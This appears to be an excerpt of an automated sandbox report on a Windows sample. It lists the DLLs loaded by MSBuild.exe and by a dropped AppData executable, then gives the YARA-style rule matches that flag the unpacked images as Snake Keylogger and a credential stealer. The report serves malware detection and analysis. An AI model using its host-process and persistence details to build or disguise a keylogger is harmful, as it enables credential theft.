Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\choice.exe	Section loaded: version.dll

Source: 3.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 11.2.sssssssssssssssss.exe.20a90de1538.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.sssssssssssssssss.exe.20a90de1538.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.sssssssssssssssss.exe.20a90de1538.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.sssssssssssssssss.exe.20a90de1538.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 8.2.sssssssssssssssss.exe.1d2a95d0d00.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.sssssssssssssssss.exe.1d2a95d0d00.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.sssssssssssssssss.exe.1d2a95d0d00.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.sssssssssssssssss.exe.1d2a95d0d00.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 11.2.sssssssssssssssss.exe.20a90de1538.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 11.2.sssssssssssssssss.exe.20a90de1538.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.sssssssssssssssss.exe.20a90de1538.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 11.2.sssssssssssssssss.exe.20a90de1538.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 8.2.sssssssssssssssss.exe.1d2a95d0d00.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.sssssssssssssssss.exe.1d2a95d0d00.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.sssssssssssssssss.exe.1d2a95d0d00.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.sssssssssssssssss.exe.1d2a95d0d00.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 8.2.sssssssssssssssss.exe.1d2a95824c8.13.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.sssssssssssssssss.exe.1d2a95824c8.13.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.sssssssssssssssss.exe.1d2a95824c8.13.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.sssssssssssssssss.exe.1d2a95824c8.13.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Pnihosiyvr.exe.1a33d91ac90.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Pnihosiyvr.exe.1a33d91ac90.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Pnihosiyvr.exe.1a33d91ac90.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.Pnihosiyvr.exe.1a33d942cc8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
